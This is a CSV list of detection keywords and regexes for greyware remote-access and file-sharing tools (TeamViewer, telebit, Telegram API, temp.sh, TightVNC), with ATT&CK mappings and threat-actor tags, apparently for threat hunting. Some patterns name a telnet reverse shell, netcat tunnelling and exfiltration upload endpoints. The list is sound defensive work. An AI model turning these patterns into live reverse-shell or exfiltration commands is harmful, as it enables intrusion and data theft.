"*taf.teamviewer.com*",".{0,1000}taf\.teamviewer\.com.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewer VPN Adapter*",".{0,1000}TeamViewer\sVPN\sAdapter.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - 
Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TEAMVIEWER.EXE-*.pf*",".{0,1000}TEAMVIEWER\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewer\tv_w32.exe*",".{0,1000}TeamViewer\\tv_w32\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewer\tv_x64.dll*",".{0,1000}TeamViewer\\tv_x64\.dll.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewer\tv_x64.exe*",".{0,1000}TeamViewer\\tv_x64\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - 
TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewer\TVNetwork.log*",".{0,1000}TeamViewer\\TVNetwork\.log.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TEAMVIEWER_.EXE-*.pf*",".{0,1000}TEAMVIEWER_\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewer_Desktop.exe*",".{0,1000}TeamViewer_Desktop\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TEAMVIEWER_DESKTOP.EXE-*.pf*",".{0,1000}TEAMVIEWER_DESKTOP\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals 
- abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewer_Hooks.log*",".{0,1000}TeamViewer_Hooks\.log.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewer_LogMutex*",".{0,1000}TeamViewer_LogMutex.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","#mutex","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewer_Service.exe*",".{0,1000}TeamViewer_Service\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TEAMVIEWER_SERVICE.EXE-*.pf*",".{0,1000}TEAMVIEWER_SERVICE\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is 
software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewer_Setup_x64.exe*",".{0,1000}TeamViewer_Setup_x64\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TEAMVIEWER_SETUP_X64.EXE-*.pf*",".{0,1000}TEAMVIEWER_SETUP_X64\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewer_VirtualDeviceDriver*",".{0,1000}TeamViewer_VirtualDeviceDriver.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" 
"*TeamViewer_XPSDriverFilter*",".{0,1000}TeamViewer_XPSDriverFilter.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewer15_Logfile.log*",".{0,1000}TeamViewer15_Logfile\.log.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewer3_Win32_Instance_Mutex*",".{0,1000}TeamViewer3_Win32_Instance_Mutex.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","#mutex","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewerHooks_DynamicMemMutex*",".{0,1000}TeamViewerHooks_DynamicMemMutex.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - 
Yanluowang","RMM","https://www.teamviewer.com/","1","0","#mutex","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewerMeetingAddIn.dll*",".{0,1000}TeamViewerMeetingAddIn\.dll.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewerMeetingAddinShim.dll*",".{0,1000}TeamViewerMeetingAddinShim\.dll.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*TeamViewerMeetingAddinShim64.dll*",".{0,1000}TeamViewerMeetingAddinShim64\.dll.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*teamviewervpn.sys*",".{0,1000}teamviewervpn\.sys.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - 
T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*.config/telebit/telebitd.yml*",".{0,1000}\.config\/telebit\/telebitd\.yml.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/cloud.telebit.remote.plist*",".{0,1000}\/cloud\.telebit\.remote\.plist.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/opt/telebit*",".{0,1000}\/opt\/telebit.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/telebit http *",".{0,1000}\/telebit\shttp\s.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/telebit.js.git*",".{0,1000}\/telebit\.js\.git.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - 
TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/telebit.service*",".{0,1000}\/telebit\.service.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/telebit/var/log/*",".{0,1000}\/telebit\/var\/log\/.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/telebit-remote.js*",".{0,1000}\/telebit\-remote\.js.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*bin/telebit.js*",".{0,1000}bin\/telebit\.js.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*cloud.telebit.remot*",".{0,1000}cloud\.telebit\.remot.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://*.telebit.io*",".{0,1000}https\:\/\/.{0,1000}\.telebit\.io.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff 
(shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://get.telebit.io*",".{0,1000}https\:\/\/get\.telebit\.io.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*install -g telebit*",".{0,1000}install\s\-g\stelebit.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*netcat *.telebit.io*",".{0,1000}netcat\s.{0,1000}\.telebit\.io.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ssh -o *.telebit.io*",".{0,1000}ssh\s\-o\s.{0,1000}\.telebit\.io.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ssh*.telebit.cloud*",".{0,1000}ssh.{0,1000}\.telebit\.cloud.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*telebit 
ssh auto*",".{0,1000}telebit\sssh\sauto.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*telebit tcp *",".{0,1000}telebit\stcp\s.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*--user-unit=telebit*",".{0,1000}\-\-user\-unit\=telebit.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\Telegram Desktop\tdata*",".{0,1000}\\AppData\\Roaming\\Telegram\sDesktop\\tdata.{0,1000}","greyware_tool_keyword","telegram","telegram API usage -given the increasing adoption of Telegram by malware for command and control (C2) operations. it's essential to monitor and restrict its usage within corporate networks and on company devices","T1071.004 - T1102 - T1047","TA0011 - TA0002 - TA0005","N/A","N/A","C2","api.telegram.org","0","1","N/A","High False positive Risk !","1","9","N/A","N/A","N/A","N/A" "*api.telegram.org*",".{0,1000}api\.telegram\.org.{0,1000}","greyware_tool_keyword","telegram","telegram API usage -given the increasing adoption of Telegram by malware for command and control (C2) operations. 
it's essential to monitor and restrict its usage within corporate networks and on company devices","T1071.004 - T1102 - T1047","TA0011 - TA0002 - TA0005","N/A","N/A","C2","api.telegram.org","0","1","N/A","High False positive Risk !","1","9","N/A","N/A","N/A","N/A" "*https://api.telegram.org/bot*/sendMessage*",".{0,1000}https\:\/\/api\.telegram\.org\/bot.{0,1000}\/sendMessage.{0,1000}","greyware_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","N/A","10","10","322","47","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z" "*&& telnet * 2>&1 </dev/console*",".{0,1000}\&\&\stelnet\s.{0,1000}\s2\>\&1\s\<\/dev\/console.{0,1000}","greyware_tool_keyword","telnet","suspicious shell commands used in various Equation Group scripts and tools","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_apt_equationgroup_lnx.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z" "*telnet * | /bin/bash | telnet *",".{0,1000}telnet\s.{0,1000}\s\|\s\/bin\/bash\s\|\stelnet\s.{0,1000}","greyware_tool_keyword","telnet","telnet reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","N/A","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z" "*http://temp.sh/*/*",".{0,1000}https\:\/\/temp\.sh\/.{0,1000}\/.{0,1000}","greyware_tool_keyword","temp.sh","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - 
TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*https://temp.sh/*/*",".{0,1000}https\:\/\/temp\.sh\/.{0,1000}\/.{0,1000}","greyware_tool_keyword","temp.sh","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*https://temp.sh/upload*",".{0,1000}https\:\/\/temp\.sh\/upload.{0,1000}","greyware_tool_keyword","temp.sh","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*https://privatix-temp-mail-v1.p.rapidapi.com/request/domains/*",".{0,1000}https\:\/\/privatix\-temp\-mail\-v1\.p\.rapidapi\.com\/request\/domains\/.{0,1000}","greyware_tool_keyword","temp-mail","using the API of a disposable email address to use anytime - could be abused by malicious actors","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","temp-mail.org","1","1","N/A","api doc https://rapidapi.com/Privatix/api/temp-mail","9","10","N/A","N/A","N/A","N/A" "*https://privatix-temp-mail-v1.p.rapidapi.com/request/mail/id/null/*",".{0,1000}https\:\/\/privatix\-temp\-mail\-v1\.p\.rapidapi\.com\/request\/mail\/id\/null\/.{0,1000}","greyware_tool_keyword","temp-mail","using the API of a disposable email address to use anytime - could be abused by malicious actors","T1071.003","TA0005 - TA0001","N/A","N/A","Defense 
Evasion","temp-mail.org","1","1","N/A","api doc https://rapidapi.com/Privatix/api/temp-mail","9","10","N/A","N/A","N/A","N/A" "*https://tempsend.com/*",".{0,1000}https\:\/\/tempsend\.com\/.{0,1000}","greyware_tool_keyword","tempsend.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*https://tempsend.com/send*",".{0,1000}https\:\/\/tempsend\.com\/send.{0,1000}","greyware_tool_keyword","tempsend.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*https://textbin.net/raw/*",".{0,1000}https\:\/\/textbin\.net\/raw\/.{0,1000}","greyware_tool_keyword","textbin.net","textbin.net raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","textbin.net","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*knmmpciebaoojcpjjoeonlcjacjopcpf*",".{0,1000}knmmpciebaoojcpjjoeonlcjacjopcpf.{0,1000}","greyware_tool_keyword","Thunder Proxy","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "* -service TightVNC 
Server*",".{0,1000}\s\-service\sTightVNC\sServer.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.\TightVNC1*",".{0,1000}\.\\TightVNC1.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*.\TightVNC2*",".{0,1000}\.\\TightVNC2.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*.\TightVNC3*",".{0,1000}\.\\TightVNC3.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*/tightvnc-*.msi*",".{0,1000}\/tightvnc\-.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.tightvnc.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\mlnhcpkomdeavomsjalt*",".{0,1000}\\mlnhcpkomdeavomsjalt.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","named pipe https://github.com/mthcht/awesome-lists/blob/9080701200e4f9f2e523bee7cde7b335121b1cb2/Lists/suspicious_named_pipe_list.csv#L2","10","10","N/A","N/A","N/A","N/A" "*\Programs\TightVNC*",".{0,1000}\\Programs\\TightVNC.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\WOW6432Node\TightVNC\*",".{0,1000}\\SOFTWARE\\WOW6432Node\\TightVNC\\.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - 